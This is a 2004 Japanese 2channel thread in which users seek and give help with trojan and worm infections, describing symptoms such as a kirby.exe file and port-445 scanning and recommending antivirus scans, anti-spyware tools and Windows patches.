名無しさん@お腹いっぱい。 :04/10/01 14:02:30
すみません、誤ってこれ踏んでしまったのですがノートンがトロイを発見しました。 そのメッセージが出た以外はインストール画面でOKとかはせずに電源を切りました。 これは感染してしまったのでしょうか?今ノートンでスキャンしてますがこれで検出されなければ問題ないですか?
915 :
名無しさん@お腹いっぱい。 :04/10/01 14:04:38
踏まないでください、つうならtまで抜けよ(゚Д゚)ゴルァ!!
>>914 最新版でスキャンして見つからなければ一応OK。
ただスパイウェアなんかも入ってる可能性があるので、
ad-awareやspy-botでスキャンしておくと良いかも。
918 :
名無しさん@お腹いっぱい。 :04/10/01 14:56:46
>>917 2002でスキャン終了しましたが検出されませんでした。
ウィルス情報は機能最新のを更新しました。
このまま使い続けて大丈夫でしょうか?
>>918 レジストリとか書き換えられてる可能性もあるから
トロイをまた呼び込んでくることも考えられる。
ときどきチェックした方が良いかも。
920 :
名無しさん@お腹いっぱい。 :04/10/01 19:03:27
質問者も回答者もカスばかり
911 はどういうもの? 怖く踏めないけど、予防のために内容を知りたい。
>>921 ウイルスセキュリティのスレだろ?
評判は以下略。
つかアドレスからして2ch内のスレだとわかるものが踏めないとはどういうことだ?
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク
926 :
名無しさん@お腹いっぱい。 :04/10/01 23:33:58
ウイルスとかもそうだけどセキュリティホールがあってもそれを 守るOSレベルでOSと連動するようなセキュリティソフトないの?
927 :
kirby??? :04/10/02 00:07:39
なんつか、新種ウイルスって出た? C:\直下にkirby.exeってできるん。そんで、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run に名前service 値C:\kirby.exeの値設定されるん。 んで、ネットワークに接続確立してからすぐnetstat /nしてみると宛先ポート445で物凄い勢いでなんかパケット送ってるん。 宛先IPアドレスは、ランダムっぽいけど多分連番でスキャヌしてる雰囲気。 DELODERみたく、SMB使って脆弱パスワド試してるんか、SASSERみたくLSASS の脆弱性突いてるんかわからん。 kirby.exeのサイズは25KB プロセス殺して、レヂストリ値消して、kirby.exe削除して再起動しるとネット繋ぐまでは何とも無いが、 ネット繋いだとたんまたC:\にカービィ.exe出来るん。 ノートンでkirby.exeスキャヌしてみると検出はするけど名前Backdoor.Trojanとしか出て来ないん。 知人の買ったばかりPCの設定いぢってて、あんまり調子悪いから調べてみたらこんなん出ました。。。 メール送受信の設定どう考えても上手くいかなくて小一時間三十分悩んだん。。。 OSはXPホームでSP1。後は知らん。ログインパスワドたぶん無し。アンチVIRは何も無いん。 ・・・・だから初心者買ったばかりXPいぢるの嫌なんぢゃ〜!! 新種で流行しそうだったら誰か新スレ立ててねん。
ぁ、ちなみにノトンの定義ファイルは最新だよん。
>>928 普通はそんなところにそんなファイル無いよね。
>>927 検出してるのに新種のわけあるまい
親玉がサーバーからインストールしてるだけジャン
>>927 トレンドマイクロのオンラインスキャンではどう出るの?
>>931 何も検出されません。
他のオンラインスキャヌも試してみるでつ。
>930
チッチッチ
ぁぁ、アンテドート簡易版だと TrojanProxy.Win32.Agent.bjと出まつねん。
>>934 なんか違うっぽいでつ。
知人Pcなんで今は他の値とか確認出来ないでつ。
とりあえず、知人PCにはMS04-011パッチでも当ててみて様子見るでつ。
明日仕事忙しいので寝まつ。zzz
937 :
名無しさん@お腹いっぱい。 :04/10/02 10:19:53
知人から「ウィルス感染したようなのでPCを見てほしい」とだけ頼まれて、 いま下調べしてる者です。 OSはおそらくXPで、症状は「なんど起動してもOSが強制終了になる」とだけ 聞いています。強制終了前にカウントダウンがあるか、どんなメッセージが 出るかまでは聞きそびれてしまいました。 SasserまたはBlasterの関連かと予想してはいるのですが、 カウントダウンなしにOSが急に落ちるような(上記とは別のタイプの?)ウィルス 情報はあがってますか? どうぞお願いします。
>>937 てか、まずスキャンしてみるのが早いと思いまつ。
アンチドート簡易版でもオンラインスキャンでもいいですから。
939 :
名無しさん@お腹いっぱい。 :04/10/02 10:28:43
即レス!どうもです。 そうですね。今日みにいく予定ですので、まずはOLスキャンをしてみる つもりです。ありがとうございます。 ただ、急にOSが落とされるようなタイプだとスキャン中に往生してしまうかな などと思いまして。。。 追加情報ありましたらおながいします
追加情報じゃなくてスマソですが、何にせよWindows Updateなんかのセキュ対策教えたり アンチウィルス買わせなきゃダメっすね 甘やかしたらこの先ずっとお助けマンとしてこき使われますぞ
941 :
名無しさん@お腹いっぱい。 :04/10/02 10:51:38
>941 それはいいかもしれませんな。SasserやBlasterの活動だって一時的に 止められますからな。 本格的な駆除は別途実施しなくちゃいかんですがな。
代理質問は効率が悪いので本人を降臨させろ
そんなに無防備なPCだと他にもスパイウエアとかイパーイ仕込まれてそうな悪寒
>>937 の週末がこれで潰れなきゃEが(((((((( ;゚Д゚)))))))
みなさまどうも。イチローキターをしてたら遅くなりました。
とくに
>>941 さん、さっそくFDに入れました。試してみます。
さて逝ってきます。
>>945 いっちゃったか
そういうなのはハードウェアに問題がある場合も多い罠
知人と言う奴は大抵本人が感染してる
948 :
ヘッポコ初心者 :04/10/02 18:50:50
ノートンインターネットセキュリティ2004 をいれています。 Backdoor.Coreflood が発見され、削除しようとしても 削除されないのですがどうすればよいのでしょうか? 教えてください
>>939 知人のPCはどうでもいいが、OLスキャンの結果報告はしてほしいな
951 :
ヘッポコ初心者 :04/10/02 18:57:35
すみません、もう少し詳しく教えてください
>>951 PestPatrolを導入したらどうかな?
私の友人が同様にバックドア系に感染し困っていたのだが・・
PestPatrolで簡単に駆除できました。
餅は餅屋でがよろいしかとおもいます。
統合型ツールの導入は安い反面、防衛力に少し難があるのではないかな?
953 :
名無しさん@お腹いっぱい。 :04/10/02 19:07:15
954 :
ヘッポコ初心者 :04/10/02 19:14:32
952さんお返事ありがとうございます。 初心者で感染も始めてで、よくわからないのですが、 どのような事に気を付ければ防げるのでしょうか?
戻ってきました。
>>947 本人じゃなーい。
自分はAVG,Spybot,Ad-awareの3本セットでふんばってるんじゃ。
…実は当人、ノートン先生を「持っていた」ようで、auto_tscでウィルス活動を
とめ、OLスキャン→先生インストール→退治 と成功しました。
出てきたのはもろもろ100匹ほどで、想像したほど多くなかったのは
Windows Updateだけはやっていたからでしょうか。
Sasserの中の人みたいのはいましたが、それが主因だったかどうかは
不明です。
いろいろお世話になりました。依頼主が女の子でないのがあれですが。
>>957 はお礼にやらないか?と言われてやってきた模様です
ウイルス感染してレジストリが変更され ウイルスを消してレジストリが変更されたままになっている時に オンラインスキャンした場合、ひっかかるのですか?
>>960 Download版から飛ばされてきました
ぜひ教えてくださいm(_ _)m
>>959 レジストリ検索するスキャンなら引っかかるのでは?
>>962 いつもSymantecのオンラインスキャンしか使わないんですけど
レジストリ検索するスキャンしてますよね?
てか、オンラインスキャンでレジストリまでスキャンされるなんて(ry
HTML_REDIR.Aのファイル名ぉιぇτ
HTML_REDIR.A
決まったファイル名などない
>>966 その過去の脆弱性を利用しているインストールファイルは全部その名前だ
それよりもウィンドウズアップデート位しろ
970 :
名無しさん@お腹いっぱい。 :04/10/03 18:04:12
971 :
名無しさん@お腹いっぱい。 :04/10/03 18:07:54
>>970 かわいそうに
何釣られてんだ?( ´,_ゝ`)
972 :
名無しさん@お腹いっぱい。 :04/10/03 18:08:51
>>970 PestPatrolを導入すれば直るね。
>>972 7種類のウィルスですね。
感染するバカがいるといけないから、削除依頼出しておけよ。
976 :
名無しさん@お腹いっぱい。 :04/10/03 18:28:50
977 :
名無しさん@お腹いっぱい。 :04/10/03 18:46:12
>>970 今さら言っても遅いけど2CHのリンクはIEで開くのは嚴禁。
>>970 ここにも書き込まなくちゃ
*.full-tgp.net
これを制限付きサイトに突っ込んであるので痛くも痒くもないんですが?
>>979 ブラウザジャッカー?
ウイルスというより、スパイウェアかも
うむ。
ていうか 親孝行>>>>マザコン だな。親を気遣うだけでマザコンと呼ばれる最近の風潮はどうかと・・・・
そろそろ次スレお願いしマツ。
今だ!2ゲットー
>>1 乙
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´
∧∧ ) (´⌒(´
⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
 ̄ ̄ (´⌒(´⌒;;
早めに流して次に移行した方がよさげかな
OLスキャン・・・・エヘヘヘヘ